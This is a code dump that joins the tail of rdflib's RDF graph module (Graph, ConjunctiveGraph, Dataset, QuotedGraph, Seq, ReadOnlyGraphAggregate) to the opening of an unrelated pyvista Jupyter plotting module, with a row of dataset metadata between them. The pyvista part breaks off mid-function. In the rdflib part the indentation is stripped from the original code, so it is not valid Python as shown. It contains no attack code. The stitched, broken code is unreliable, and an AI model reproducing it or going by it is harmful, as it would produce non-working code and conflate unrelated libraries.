remember[subject] = 1
yield subject
for object in self.objects(subject, property):
for o in self.transitive_objects(object, property, remember):
yield o
def transitive_subjects(self, predicate, object, remember=None):
"""Transitively generate objects for the ``property`` relationship
Generated objects belong to the depth first transitive closure of the
``property`` relationship starting at ``subject``.
"""
if remember is None:
remember = {}
if object in remember:
return
remember[object] = 1
yield object
for subject in self.subjects(predicate, object):
for s in self.transitive_subjects(predicate, subject, remember):
yield s
def seq(self, subject):
"""Check if subject is an rdf:Seq
If yes, it returns a Seq class instance, None otherwise.
"""
if (subject, RDF.type, RDF.Seq) in self:
return Seq(self, subject)
else:
return None
def qname(self, uri):
return self.namespace_manager.qname(uri)
def compute_qname(self, uri, generate=True):
return self.namespace_manager.compute_qname(uri, generate)
def bind(self, prefix, namespace, override=True, replace=False):
"""Bind prefix to namespace
If override is True will bind namespace to given prefix even
if namespace was already bound to a different prefix.
if replace, replace any existing prefix with the new namespace
for example: graph.bind('foaf', 'http://xmlns.com/foaf/0.1/')
"""
return self.namespace_manager.bind(
prefix, namespace, override=override, replace=replace)
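    # Usage sketch (illustrative; the prefix and namespace are arbitrary examples):
    #
    #   g.bind("foaf", "http://xmlns.com/foaf/0.1/")
    #   dict(g.namespaces())["foaf"]                      # -> the bound namespace URI
    #   g.qname(URIRef("http://xmlns.com/foaf/0.1/name")) # -> "foaf:name"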
def namespaces(self):
"""Generator over all the prefix, namespace tuples"""
for prefix, namespace in self.namespace_manager.namespaces():
yield prefix, namespace
def absolutize(self, uri, defrag=1):
"""Turn uri into an absolute URI if it's not one already"""
return self.namespace_manager.absolutize(uri, defrag)
def serialize(self, destination=None, format="xml",
base=None, encoding=None, **args):
"""Serialize the Graph to destination
If destination is None serialize method returns the serialization as a
string. Format defaults to xml (AKA rdf/xml).
Format support can be extended with plugins,
but 'xml', 'n3', 'turtle', 'nt', 'pretty-xml', 'trix', 'trig' and 'nquads' are built in.
"""
serializer = plugin.get(format, Serializer)(self)
if destination is None:
stream = BytesIO()
serializer.serialize(stream, base=base, encoding=encoding, **args)
return stream.getvalue()
if hasattr(destination, "write"):
stream = destination
serializer.serialize(stream, base=base, encoding=encoding, **args)
else:
location = destination
scheme, netloc, path, params, _query, fragment = urlparse(location)
if netloc != "":
print("WARNING: not saving as location" +
"is not a local file reference")
return
fd, name = tempfile.mkstemp()
stream = os.fdopen(fd, "wb")
serializer.serialize(stream, base=base, encoding=encoding, **args)
stream.close()
if hasattr(shutil, "move"):
shutil.move(name, path)
else:
shutil.copy(name, path)
os.remove(name)
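    # Usage sketch (illustrative; the file name is a hypothetical example):
    #
    #   data = g.serialize(format="turtle")              # returns the serialization
    #   g.serialize(destination="out.nt", format="nt")   # writes to a local file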
def parse(self, source=None, publicID=None, format=None,
location=None, file=None, data=None, **args):
"""
Parse source adding the resulting triples to the Graph.
The source is specified using one of source, location, file or
data.
:Parameters:
- `source`: An InputSource, file-like object, or string. In the case
of a string the string is the location of the source.
- `location`: A string indicating the relative or absolute URL of the
source. Graph's absolutize method is used if a relative location
is specified.
- `file`: A file-like object.
- `data`: A string containing the data to be parsed.
- `format`: Used if format can not be determined from source.
Defaults to rdf/xml. Format support can be extended with plugins,
but 'xml', 'n3', 'nt', 'trix', 'rdfa' are built in.
- `publicID`: the logical URI to use as the document base. If None
specified the document location is used (at least in the case where
there is a document location).
:Returns:
- self, the graph instance.
Examples:
>>> my_data = '''
... <rdf:RDF
... xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns#'
... xmlns:rdfs='http://www.w3.org/2000/01/rdf-schema#'
... >
... <rdf:Description>
... <rdfs:label>Example</rdfs:label>
... <rdfs:comment>This is really just an example.</rdfs:comment>
... </rdf:Description>
... </rdf:RDF>
... '''
>>> import tempfile
>>> fd, file_name = tempfile.mkstemp()
>>> f = os.fdopen(fd, 'w')
>>> dummy = f.write(my_data) # Returns num bytes written on py3
>>> f.close()
>>> g = Graph()
>>> result = g.parse(data=my_data, format="application/rdf+xml")
>>> len(g)
2
>>> g = Graph()
>>> result = g.parse(location=file_name, format="application/rdf+xml")
>>> len(g)
2
>>> g = Graph()
>>> with open(file_name, "r") as f:
... result = g.parse(f, format="application/rdf+xml")
>>> len(g)
2
>>> os.remove(file_name)
"""
source = create_input_source(source=source, publicID=publicID,
location=location, file=file,
data=data, format=format)
if format is None:
format = source.content_type
if format is None:
# raise Exception("Could not determine format for %r. You can" + \
# "expicitly specify one with the format argument." % source)
format = "application/rdf+xml"
parser = plugin.get(format, Parser)()
try:
parser.parse(source, self, **args)
finally:
if source.auto_close:
source.close()
return self
def load(self, source, publicID=None, format="xml"):
self.parse(source, publicID, format)
def query(self, query_object, processor='sparql',
result='sparql', initNs=None, initBindings=None,
use_store_provided=True, **kwargs):
"""
Query this graph.
A type of 'prepared queries' can be realised by providing
initial variable bindings with initBindings
Initial namespaces are used to resolve prefixes used in the query,
if none are given, the namespaces from the graph's namespace manager
are used.
:returntype: rdflib.query.QueryResult
"""
initBindings = initBindings or {}
initNs = initNs or dict(self.namespaces())
if hasattr(self.store, "query") and use_store_provided:
try:
return self.store.query(
query_object, initNs, initBindings,
self.default_union and
'__UNION__' or
self.identifier,
**kwargs)
except NotImplementedError:
pass # store has no own implementation
if not isinstance(result, query.Result):
result = plugin.get(result, query.Result)
if not isinstance(processor, query.Processor):
processor = plugin.get(processor, query.Processor)(self)
return result(processor.query(
query_object, initBindings, initNs, **kwargs))
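    # Usage sketch (illustrative; the query string and binding are examples only):
    #
    #   qres = g.query("SELECT ?s WHERE { ?s ?p ?o }")
    #   for row in qres:
    #       print(row.s)
    #   g.query("SELECT ?o WHERE { ?s ?p ?o }", initBindings={"s": some_subject})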
def update(self, update_object, processor='sparql',
initNs=None, initBindings=None,
use_store_provided=True, **kwargs):
"""Update this graph with the given update query."""
initBindings = initBindings or {}
initNs = initNs or dict(self.namespaces())
if hasattr(self.store, "update") and use_store_provided:
try:
return self.store.update(
update_object, initNs, initBindings,
self.default_union and
'__UNION__' or
self.identifier,
**kwargs)
except NotImplementedError:
pass # store has no own implementation
if not isinstance(processor, query.UpdateProcessor):
processor = plugin.get(processor, query.UpdateProcessor)(self)
return processor.update(update_object, initBindings, initNs, **kwargs)
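    # Usage sketch (illustrative; the URIs in the update string are hypothetical):
    #
    #   g.update("INSERT DATA { <http://example.org/a> <http://example.org/b> 'foo' }")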
def n3(self):
"""return an n3 identifier for the Graph"""
return "[%s]" % self.identifier.n3()
def __reduce__(self):
return (Graph, (self.store, self.identifier,))
def isomorphic(self, other):
"""
does a very basic check if these graphs are the same
If no BNodes are involved, this is accurate.
See rdflib.compare for a correct implementation of isomorphism checks
"""
# TODO: this is only an approximation.
if len(self) != len(other):
return False
for s, p, o in self:
if not isinstance(s, BNode) and not isinstance(o, BNode):
if not (s, p, o) in other:
return False
for s, p, o in other:
if not isinstance(s, BNode) and not isinstance(o, BNode):
if not (s, p, o) in self:
return False
# TODO: very well could be a false positive at this point yet.
return True
def connected(self):
"""Check if the Graph is connected
        The Graph is considered undirected.
        Performs a search on the Graph, starting from a random node. Then
        iteratively goes depth-first through the triples where the node is
subject and object. Return True if all nodes have been visited and
False if it cannot continue and there are still unvisited nodes left.
"""
all_nodes = list(self.all_nodes())
discovered = []
# take a random one, could also always take the first one, doesn't
# really matter.
if not all_nodes:
return False
visiting = [all_nodes[random.randrange(len(all_nodes))]]
while visiting:
x = visiting.pop()
if x not in discovered:
discovered.append(x)
for new_x in self.objects(subject=x):
if new_x not in discovered and new_x not in visiting:
visiting.append(new_x)
for new_x in self.subjects(object=x):
if new_x not in discovered and new_x not in visiting:
visiting.append(new_x)
# optimisation by only considering length, since no new objects can
# be introduced anywhere.
if len(all_nodes) == len(discovered):
return True
else:
return False
def all_nodes(self):
res = set(self.objects())
res.update(self.subjects())
return res
def collection(self, identifier):
"""Create a new ``Collection`` instance.
Parameters:
- ``identifier``: a URIRef or BNode instance.
Example::
>>> graph = Graph()
>>> uri = URIRef("http://example.org/resource")
>>> collection = graph.collection(uri)
>>> assert isinstance(collection, Collection)
>>> assert collection.uri is uri
>>> assert collection.graph is graph
>>> collection += [ Literal(1), Literal(2) ]
"""
return Collection(self, identifier)
def resource(self, identifier):
"""Create a new ``Resource`` instance.
Parameters:
- ``identifier``: a URIRef or BNode instance.
Example::
>>> graph = Graph()
>>> uri = URIRef("http://example.org/resource")
>>> resource = graph.resource(uri)
>>> assert isinstance(resource, Resource)
>>> assert resource.identifier is uri
>>> assert resource.graph is graph
"""
if not isinstance(identifier, Node):
identifier = URIRef(identifier)
return Resource(self, identifier)
def _process_skolem_tuples(self, target, func):
for t in self.triples((None, None, None)):
target.add(func(t))
def skolemize(self, new_graph=None, bnode=None, authority=None, basepath=None):
def do_skolemize(bnode, t):
(s, p, o) = t
if s == bnode:
s = s.skolemize(authority=authority, basepath=basepath)
if o == bnode:
o = o.skolemize(authority=authority, basepath=basepath)
return (s, p, o)
def do_skolemize2(t):
(s, p, o) = t
if isinstance(s, BNode):
s = s.skolemize(authority=authority, basepath=basepath)
if isinstance(o, BNode):
o = o.skolemize(authority=authority, basepath=basepath)
return (s, p, o)
retval = Graph() if new_graph is None else new_graph
if bnode is None:
self._process_skolem_tuples(retval, do_skolemize2)
elif isinstance(bnode, BNode):
self._process_skolem_tuples(
retval, lambda t: do_skolemize(bnode, t))
return retval
def de_skolemize(self, new_graph=None, uriref=None):
def do_de_skolemize(uriref, t):
(s, p, o) = t
if s == uriref:
s = s.de_skolemize()
if o == uriref:
o = o.de_skolemize()
return (s, p, o)
def do_de_skolemize2(t):
(s, p, o) = t
if isinstance(s, Genid):
s = s.de_skolemize()
if isinstance(o, Genid):
o = o.de_skolemize()
return (s, p, o)
retval = Graph() if new_graph is None else new_graph
if uriref is None:
self._process_skolem_tuples(retval, do_de_skolemize2)
elif isinstance(uriref, Genid):
self._process_skolem_tuples(
retval, lambda t: do_de_skolemize(uriref, t))
return retval
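    # Usage sketch (illustrative; the triple is a hypothetical example):
    # skolemize/de_skolemize round-trip blank nodes through skolem (genid) URIRefs.
    #
    #   g = Graph()
    #   g.add((BNode(), RDF.value, Literal(1)))
    #   sk = g.skolemize()       # BNodes become skolem (genid) URIRefs
    #   rt = sk.de_skolemize()   # genid URIRefs become BNodes again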
class ConjunctiveGraph(Graph):
"""
A ConjunctiveGraph is an (unnamed) aggregation of all the named
graphs in a store.
It has a ``default`` graph, whose name is associated with the
graph throughout its life. :meth:`__init__` can take an identifier
to use as the name of this default graph or it will assign a
BNode.
All methods that add triples work against this default graph.
All queries are carried out against the union of all graphs.
"""
def __init__(self, store='default', identifier=None):
super(ConjunctiveGraph, self).__init__(store, identifier=identifier)
assert self.store.context_aware, ("ConjunctiveGraph must be backed by"
" a context aware store.")
self.context_aware = True
self.default_union = True # Conjunctive!
self.default_context = Graph(store=self.store,
identifier=identifier or BNode())
def __str__(self):
pattern = ("[a rdflib:ConjunctiveGraph;rdflib:storage "
"[a rdflib:Store;rdfs:label '%s']]")
return pattern % self.store.__class__.__name__
def _spoc(self, triple_or_quad, default=False):
"""
helper method for having methods that support
either triples or quads
"""
if triple_or_quad is None:
return (None, None, None, self.default_context if default else None)
if len(triple_or_quad) == 3:
c = self.default_context if default else None
(s, p, o) = triple_or_quad
elif len(triple_or_quad) == 4:
(s, p, o, c) = triple_or_quad
c = self._graph(c)
return s, p, o, c
def __contains__(self, triple_or_quad):
"""Support for 'triple/quad in graph' syntax"""
s, p, o, c = self._spoc(triple_or_quad)
for t in self.triples((s, p, o), context=c):
return True
return False
def add(self, triple_or_quad):
"""
Add a triple or quad to the store.
if a triple is given it is added to the default context
"""
s, p, o, c = self._spoc(triple_or_quad, default=True)
_assertnode(s, p, o)
self.store.add((s, p, o), context=c, quoted=False)
def _graph(self, c):
if c is None:
return None
if not isinstance(c, Graph):
return self.get_context(c)
else:
return c
def addN(self, quads):
"""Add a sequence of triples with context"""
self.store.addN(
(s, p, o, self._graph(c)) for s, p, o, c in quads if
_assertnode(s, p, o)
)
def remove(self, triple_or_quad):
"""
        Removes a triple or quad.
        If a triple is given, it is removed from all contexts;
        a quad is removed from the given context only.
"""
s, p, o, c = self._spoc(triple_or_quad)
self.store.remove((s, p, o), context=c)
def triples(self, triple_or_quad, context=None):
"""
Iterate over all the triples in the entire conjunctive graph
For legacy reasons, this can take the context to query either
as a fourth element of the quad, or as the explicit context
keyword parameter. The kw param takes precedence.
"""
s, p, o, c = self._spoc(triple_or_quad)
context = self._graph(context or c)
if self.default_union:
if context == self.default_context:
context = None
else:
if context is None:
context = self.default_context
if isinstance(p, Path):
if context is None:
context = self
for s, o in p.eval(context, s, o):
yield (s, p, o)
else:
for (s, p, o), cg in self.store.triples((s, p, o), context=context):
yield s, p, o
def quads(self, triple_or_quad=None):
"""Iterate over all the quads in the entire conjunctive graph"""
s, p, o, c = self._spoc(triple_or_quad)
for (s, p, o), cg in self.store.triples((s, p, o), context=c):
for ctx in cg:
yield s, p, o, ctx
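    # Usage sketch (illustrative; s, p, o and the graph name are hypothetical):
    # a plain triple goes to the default context, a quad targets a named graph.
    #
    #   cg = ConjunctiveGraph()
    #   cg.add((s, p, o))
    #   cg.add((s, p, o, cg.get_context(URIRef("http://example.org/g"))))
    #   list(cg.quads((None, None, None, None)))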
def triples_choices(self, triple, context=None):
"""Iterate over all the triples in the entire conjunctive graph"""
s, p, o = triple
if context is None:
if not self.default_union:
context = self.default_context
else:
context = self._graph(context)
for (s1, p1, o1), cg in self.store.triples_choices((s, p, o),
context=context):
yield (s1, p1, o1)
def __len__(self):
"""Number of triples in the entire conjunctive graph"""
return self.store.__len__()
def contexts(self, triple=None):
"""Iterate over all contexts in the graph
If triple is specified, iterate over all contexts the triple is in.
"""
for context in self.store.contexts(triple):
if isinstance(context, Graph):
# TODO: One of these should never happen and probably
# should raise an exception rather than smoothing over
# the weirdness - see #225
yield context
else:
yield self.get_context(context)
def get_context(self, identifier, quoted=False):
"""Return a context graph for the given identifier
identifier must be a URIRef or BNode.
"""
return Graph(store=self.store, identifier=identifier,
namespace_manager=self)
def remove_context(self, context):
"""Removes the given context from the graph"""
self.store.remove((None, None, None), context)
def context_id(self, uri, context_id=None):
"""URI#context"""
uri = uri.split("#", 1)[0]
if context_id is None:
context_id = "#context"
return URIRef(context_id, base=uri)
def parse(self, source=None, publicID=None, format="xml",
location=None, file=None, data=None, **args):
"""
Parse source adding the resulting triples to its own context
(sub graph of this graph).
See :meth:`rdflib.graph.Graph.parse` for documentation on arguments.
:Returns:
The graph into which the source was parsed. In the case of n3
it returns the root context.
"""
source = create_input_source(
source=source, publicID=publicID, location=location,
file=file, data=data, format=format)
g_id = publicID and publicID or source.getPublicId()
if not isinstance(g_id, Node):
g_id = URIRef(g_id)
context = Graph(store=self.store, identifier=g_id)
context.remove((None, None, None)) # hmm ?
context.parse(source, publicID=publicID, format=format, **args)
return context
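    # Usage sketch (illustrative; the data string and publicID are hypothetical):
    #
    #   cg = ConjunctiveGraph()
    #   ctx = cg.parse(data='<http://example.org/a> <http://example.org/b> "foo" .',
    #                  format="n3", publicID="http://example.org/graph")
    #   ctx.identifier   # -> URIRef("http://example.org/graph")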
def __reduce__(self):
return (ConjunctiveGraph, (self.store, self.identifier))
DATASET_DEFAULT_GRAPH_ID = URIRef('urn:x-rdflib:default')
class Dataset(ConjunctiveGraph):
__doc__ = """
RDF 1.1 Dataset. Small extension to the Conjunctive Graph:
- the primary term is graphs in the datasets and not contexts with quads,
so there is a separate method to set/retrieve a graph in a dataset and
operate with graphs
- graphs cannot be identified with blank nodes
- added a method to directly add a single quad
Examples of usage:
>>> # Create a new Dataset
>>> ds = Dataset()
>>> # simple triples goes to default graph
>>> ds.add((URIRef('http://example.org/a'),
... URIRef('http://www.example.org/b'),
... Literal('foo')))
>>>
>>> # Create a graph in the dataset, if the graph name has already been
>>> # used, the corresponding graph will be returned
>>> # (ie, the Dataset keeps track of the constituent graphs)
>>> g = ds.graph(URIRef('http://www.example.com/gr'))
>>>
>>> # add triples to the new graph as usual
>>> g.add(
... (URIRef('http://example.org/x'),
... URIRef('http://example.org/y'),
... Literal('bar')) )
>>> # alternatively: add a quad to the dataset -> goes to the graph
>>> ds.add(
... (URIRef('http://example.org/x'),
... URIRef('http://example.org/z'),
... Literal('foo-bar'),g) )
>>>
>>> # querying triples return them all regardless of the graph
>>> for t in ds.triples((None,None,None)): # doctest: +SKIP
... print(t) # doctest: +NORMALIZE_WHITESPACE
(rdflib.term.URIRef(u'http://example.org/a'),
rdflib.term.URIRef(u'http://www.example.org/b'),
rdflib.term.Literal(u'foo'))
(rdflib.term.URIRef(u'http://example.org/x'),
rdflib.term.URIRef(u'http://example.org/z'),
rdflib.term.Literal(u'foo-bar'))
(rdflib.term.URIRef(u'http://example.org/x'),
rdflib.term.URIRef(u'http://example.org/y'),
rdflib.term.Literal(u'bar'))
>>>
>>> # querying quads return quads; the fourth argument can be unrestricted
>>> # or restricted to a graph
>>> for q in ds.quads((None, None, None, None)): # doctest: +SKIP
... print(q) # doctest: +NORMALIZE_WHITESPACE
(rdflib.term.URIRef(u'http://example.org/a'),
rdflib.term.URIRef(u'http://www.example.org/b'),
rdflib.term.Literal(u'foo'),
None)
(rdflib.term.URIRef(u'http://example.org/x'),
rdflib.term.URIRef(u'http://example.org/y'),
rdflib.term.Literal(u'bar'),
rdflib.term.URIRef(u'http://www.example.com/gr'))
(rdflib.term.URIRef(u'http://example.org/x'),
rdflib.term.URIRef(u'http://example.org/z'),
rdflib.term.Literal(u'foo-bar'),
rdflib.term.URIRef(u'http://www.example.com/gr'))
>>>
>>> for q in ds.quads((None,None,None,g)): # doctest: +SKIP
... print(q) # doctest: +NORMALIZE_WHITESPACE
(rdflib.term.URIRef(u'http://example.org/x'),
rdflib.term.URIRef(u'http://example.org/y'),
rdflib.term.Literal(u'bar'),
rdflib.term.URIRef(u'http://www.example.com/gr'))
(rdflib.term.URIRef(u'http://example.org/x'),
rdflib.term.URIRef(u'http://example.org/z'),
rdflib.term.Literal(u'foo-bar'),
rdflib.term.URIRef(u'http://www.example.com/gr'))
>>> # Note that in the call above -
>>> # ds.quads((None,None,None,'http://www.example.com/gr'))
>>> # would have been accepted, too
>>>
>>> # graph names in the dataset can be queried:
>>> for c in ds.graphs(): # doctest: +SKIP
... print(c) # doctest:
DEFAULT
http://www.example.com/gr
>>> # A graph can be created without specifying a name; a skolemized genid
>>> # is created on the fly
>>> h = ds.graph()
>>> for c in ds.graphs(): # doctest: +SKIP
... print(c) # doctest: +NORMALIZE_WHITESPACE +ELLIPSIS
DEFAULT
http://rdlib.net/.well-known/genid/rdflib/N...
http://www.example.com/gr
>>> # Note that the Dataset.graphs() call returns names of empty graphs,
>>> # too. This can be restricted:
>>> for c in ds.graphs(empty=False): # doctest: +SKIP
... print(c) # doctest: +NORMALIZE_WHITESPACE
DEFAULT
http://www.example.com/gr
>>>
>>> # a graph can also be removed from a dataset via ds.remove_graph(g)
.. versionadded:: 4.0
"""
def __init__(self, store='default', default_union=False):
super(Dataset, self).__init__(store=store, identifier=None)
if not self.store.graph_aware:
raise Exception("DataSet must be backed by a graph-aware store!")
self.default_context = Graph(store=self.store, identifier=DATASET_DEFAULT_GRAPH_ID)
self.default_union = default_union
def __str__(self):
pattern = ("[a rdflib:Dataset;rdflib:storage "
"[a rdflib:Store;rdfs:label '%s']]")
return pattern % self.store.__class__.__name__
def graph(self, identifier=None):
if identifier is None:
from rdflib.term import rdflib_skolem_genid
self.bind(
"genid", "http://rdflib.net" + rdflib_skolem_genid,
override=False)
identifier = BNode().skolemize()
g = self._graph(identifier)
self.store.add_graph(g)
return g
def parse(self, source=None, publicID=None, format="xml",
location=None, file=None, data=None, **args):
c = ConjunctiveGraph.parse(self, source, publicID, format, location, file, data, **args)
self.graph(c)
return c
def add_graph(self, g):
"""alias of graph for consistency"""
return self.graph(g)
def remove_graph(self, g):
if not isinstance(g, Graph):
g = self.get_context(g)
self.store.remove_graph(g)
if g is None or g == self.default_context:
# default graph cannot be removed
# only triples deleted, so add it back in
self.store.add_graph(self.default_context)
def contexts(self, triple=None):
default = False
for c in super(Dataset, self).contexts(triple):
default |= c.identifier == DATASET_DEFAULT_GRAPH_ID
yield c
if not default:
yield self.graph(DATASET_DEFAULT_GRAPH_ID)
graphs = contexts
def quads(self, quad):
for s, p, o, c in super(Dataset, self).quads(quad):
if c.identifier == self.default_context:
yield (s, p, o, None)
else:
yield (s, p, o, c.identifier)
class QuotedGraph(Graph):
"""
Quoted Graphs are intended to implement Notation 3 formulae. They are
associated with a required identifier that the N3 parser *must* provide
in order to maintain consistent formulae identification for scenarios
such as implication and other such processing.
"""
def __init__(self, store, identifier):
super(QuotedGraph, self).__init__(store, identifier)
def add(self, triple):
"""Add a triple with self as context"""
s, p, o = triple
assert isinstance(s, Node), \
"Subject %s must be an rdflib term" % (s,)
assert isinstance(p, Node), \
"Predicate %s must be an rdflib term" % (p,)
assert isinstance(o, Node), \
"Object %s must be an rdflib term" % (o,)
self.store.add((s, p, o), self, quoted=True)
def addN(self, quads):
"""Add a sequence of triple with context"""
self.store.addN(
(s, p, o, c) for s, p, o, c in quads
if isinstance(c, QuotedGraph) and
c.identifier is self.identifier and
_assertnode(s, p, o)
)
def n3(self):
"""Return an n3 identifier for the Graph"""
return "{%s}" % self.identifier.n3()
def __str__(self):
identifier = self.identifier.n3()
label = self.store.__class__.__name__
pattern = ("{this rdflib.identifier %s;rdflib:storage "
"[a rdflib:Store;rdfs:label '%s']}")
return pattern % (identifier, label)
def __reduce__(self):
return (QuotedGraph, (self.store, self.identifier))
# Make sure QuotedGraph is ordered correctly
# wrt to other Terms.
# this must be done here, as the QuotedGraph cannot be
# circularly imported in term.py
rdflib.term._ORDERING[QuotedGraph] = 11
class Seq(object):
"""Wrapper around an RDF Seq resource
It implements a container type in Python with the order of the items
returned corresponding to the Seq content. It is based on the natural
ordering of the predicate names _1, _2, _3, etc, which is the
'implementation' of a sequence in RDF terms.
"""
def __init__(self, graph, subject):
"""Parameters:
- graph:
the graph containing the Seq
- subject:
the subject of a Seq. Note that the init does not
check whether this is a Seq, this is done in whoever
creates this instance!
"""
_list = self._list = list()
LI_INDEX = URIRef(str(RDF) + "_")
for (p, o) in graph.predicate_objects(subject):
if p.startswith(LI_INDEX): # != RDF.Seq: #
i = int(p.replace(LI_INDEX, ''))
_list.append((i, o))
# here is the trick: the predicates are _1, _2, _3, etc. Ie,
# by sorting the keys (by integer) we have what we want!
_list.sort()
def toPython(self):
return self
def __iter__(self):
"""Generator over the items in the Seq"""
for _, item in self._list:
yield item
def __len__(self):
"""Length of the Seq"""
return len(self._list)
def __getitem__(self, index):
"""Item given by index from the Seq"""
index, item = self._list.__getitem__(index)
return item
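    # Usage sketch (illustrative; ``seq_node`` is a hypothetical subject):
    #
    #   s = graph.seq(seq_node)   # None unless (seq_node, RDF.type, RDF.Seq) is present
    #   len(s), s[0], list(s)     # items are returned in _1, _2, ... order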
class ModificationException(Exception):
def __init__(self):
pass
def __str__(self):
return ("Modifications and transactional operations not allowed on "
"ReadOnlyGraphAggregate instances")
class UnSupportedAggregateOperation(Exception):
def __init__(self):
pass
def __str__(self):
return ("This operation is not supported by ReadOnlyGraphAggregate "
"instances")
class ReadOnlyGraphAggregate(ConjunctiveGraph):
"""Utility class for treating a set of graphs as a single graph
Only read operations are supported (hence the name). Essentially a
ConjunctiveGraph over an explicit subset of the entire store.
"""
def __init__(self, graphs, store='default'):
if store is not None:
super(ReadOnlyGraphAggregate, self).__init__(store)
Graph.__init__(self, store)
self.__namespace_manager = None
assert isinstance(graphs, list) \
and graphs \
and [g for g in graphs if isinstance(g, Graph)], \
"graphs argument must be a list of Graphs!!"
self.graphs = graphs
def __repr__(self):
return "<ReadOnlyGraphAggregate: %s graphs>" % len(self.graphs)
def destroy(self, configuration):
raise ModificationException()
# Transactional interfaces (optional)
def commit(self):
raise ModificationException()
def rollback(self):
raise ModificationException()
def open(self, configuration, create=False):
# TODO: is there a use case for this method?
for graph in self.graphs:
            graph.open(configuration, create)
def close(self):
for graph in self.graphs:
graph.close()
def add(self, triple):
raise ModificationException()
def addN(self, quads):
raise ModificationException()
def remove(self, triple):
raise ModificationException()
def triples(self, triple):
s, p, o = triple
for graph in self.graphs:
if isinstance(p, Path):
for s, o in p.eval(self, s, o):
yield s, p, o
else:
for s1, p1, o1 in graph.triples((s, p, o)):
yield (s1, p1, o1)
def __contains__(self, triple_or_quad):
context = None
if len(triple_or_quad) == 4:
context = triple_or_quad[3]
for graph in self.graphs:
if context is None or graph.identifier == context.identifier:
if triple_or_quad[:3] in graph:
return True
return False
def quads(self, triple):
"""Iterate over all the quads in the entire aggregate graph"""
s, p, o = triple
for graph in self.graphs:
for s1, p1, o1 in graph.triples((s, p, o)):
yield (s1, p1, o1, graph)
def __len__(self):
return sum(len(g) for g in self.graphs)
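    # Usage sketch (illustrative; g1 and g2 are hypothetical Graph instances):
    #
    #   agg = ReadOnlyGraphAggregate([g1, g2])
    #   len(agg)              # total number of triples across both graphs
    #   agg.add((s, p, o))    # raises ModificationException (read-only)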
def __hash__(self):
raise UnSupportedAggregateOperation()
def __cmp__(self, other):
if other is None:
return -1
elif isinstance(other, Graph):
return -1
elif isinstance(other, ReadOnlyGraphAggregate):
return cmp(self.graphs, other.graphs)
else:
return -1
def __iadd__(self, other):
raise ModificationException()
def __isub__(self, other):
raise ModificationException()
# Conv. methods
def triples_choices(self, triple, context=None):
subject, predicate, object_ = triple
for graph in self.graphs:
choices = graph.triples_choices((subject, predicate, object_))
for (s, p, o) in choices:
yield (s, p, o)
def qname(self, uri):
if hasattr(self, 'namespace_manager') and self.namespace_manager:
return self.namespace_manager.qname(uri)
raise UnSupportedAggregateOperation()
def compute_qname(self, uri, generate=True):
if hasattr(self, 'namespace_manager') and self.namespace_manager:
return self.namespace_manager.compute_qname(uri, generate)
raise UnSupportedAggregateOperation()
def bind(self, prefix, namespace, override=True):
raise UnSupportedAggregateOperation()
def namespaces(self):
if hasattr(self, 'namespace_manager'):
for prefix, namespace in self.namespace_manager.namespaces():
yield prefix, namespace
else:
for graph in self.graphs:
for prefix, namespace in graph.namespaces():
yield prefix, namespace
def absolutize(self, uri, defrag=1):
raise UnSupportedAggregateOperation()
def parse(self, source, publicID=None, format="xml", **args):
raise ModificationException()
def n3(self):
raise UnSupportedAggregateOperation()
def __reduce__(self):
raise UnSupportedAggregateOperation()
def _assertnode(*terms):
for t in terms:
assert isinstance(t, Node), \
'Term %s must be an rdflib term' % (t,)
return True
def test():
import doctest
doctest.testmod()
if __name__ == '__main__':
test()
| 34.425258 | 118 | 0.593082 |
4a27e703da09fdadff9171e305f9e3a2a96ed97a | 5,386 | py | Python | pyvista/jupyter/notebook.py | rohankumardubey/pyvista | ec5aa343d857d0c7e6a79aeeba340797bc868ced | ["MIT"] | null | null | null | pyvista/jupyter/notebook.py | rohankumardubey/pyvista | ec5aa343d857d0c7e6a79aeeba340797bc868ced | ["MIT"] | null | null | null | pyvista/jupyter/notebook.py | rohankumardubey/pyvista | ec5aa343d857d0c7e6a79aeeba340797bc868ced | ["MIT"] | null | null | null |
"""
Support dynamic or static jupyter notebook plotting.
Includes:
* ``ipyvtklink``
* ``panel``
"""
import warnings
import os
import numpy as np
# This module should not be imported at the __init__ level, only as a
# lazy import when trying to plot using jupyter notebooks
try:
import IPython
from IPython import display
except ImportError: # pragma: no cover
raise ImportError('Install IPython to display an image in a notebook')
from pyvista import _vtk
PANEL_EXTENSION_SET = [False]
def handle_plotter(plotter, backend=None, screenshot=None,
return_viewer=False, **kwargs):
"""Show the ``pyvista`` plot in a jupyter environment.
Parameters
----------
return_viewer : bool, optional
Return the jupyterlab viewer, scene, or display object
when plotting with jupyter notebook.
Returns
-------
IPython Widget
IPython widget when ``return_viewer==True``. Otherwise, ``None``.
"""
if screenshot is False:
screenshot = None
try:
if backend == 'ipyvtklink':
return show_ipyvtk(plotter, return_viewer)
if backend == 'panel':
return show_panel(plotter, return_viewer)
if backend == 'ipygany':
from pyvista.jupyter.pv_ipygany import show_ipygany
return show_ipygany(plotter, return_viewer, **kwargs)
except ImportError as e:
warnings.warn(f'Failed to use notebook backend: \n\n{e}\n\n'
'Falling back to a static output.')
return show_static_image(plotter, screenshot, return_viewer)
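# Usage sketch (illustrative; the mesh and backend choice are hypothetical examples,
# and the exact call path depends on the pyvista version):
#
#   import pyvista as pv
#   pl = pv.Plotter(notebook=True)
#   pl.add_mesh(pv.Sphere())
#   pl.show(jupyter_backend="panel")   # show() hands the plotter to handle_plotter()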
def show_static_image(plotter, screenshot, return_viewer):
"""Display a static image to be displayed within a jupyter notebook."""
import PIL.Image
if plotter.last_image is None:
# Must render here, otherwise plotter will segfault.
plotter.render()
plotter.last_image = plotter.screenshot(screenshot, return_img=True)
image = PIL.Image.fromarray(plotter.last_image)
# close plotter as this will be a static image and there is no
# point to keeping the plotter around.
plotter.close()
# Simply display the result: either ipyvtklink object or image display
if return_viewer:
return image
display.display(image)
def show_ipyvtk(plotter, return_viewer):
"""Display an interactive viewer widget using ``ipyvtklink``."""
if any('SPYDER' in name for name in os.environ):
warnings.warn('``use_ipyvtk`` is incompatible with Spyder.\n'
'Use notebook=False for interactive '
'plotting within spyder or disable it globally with:\n'
'pyvista.set_jupyter_backend(None)')
try:
from ipyvtklink.viewer import ViewInteractiveWidget
except ImportError: # pragma: no cover
raise ImportError('Please install `ipyvtklink` to use this feature: '
'https://github.com/Kitware/ipyvtklink')
# Have to leave the Plotter open for the widget to use
disp = ViewInteractiveWidget(plotter.ren_win, on_close=plotter.close,
transparent_background=plotter.image_transparent_background)
for renderer in plotter.renderers:
renderer.AddObserver(_vtk.vtkCommand.ModifiedEvent, lambda *args: disp.update_canvas())
if return_viewer:
return disp
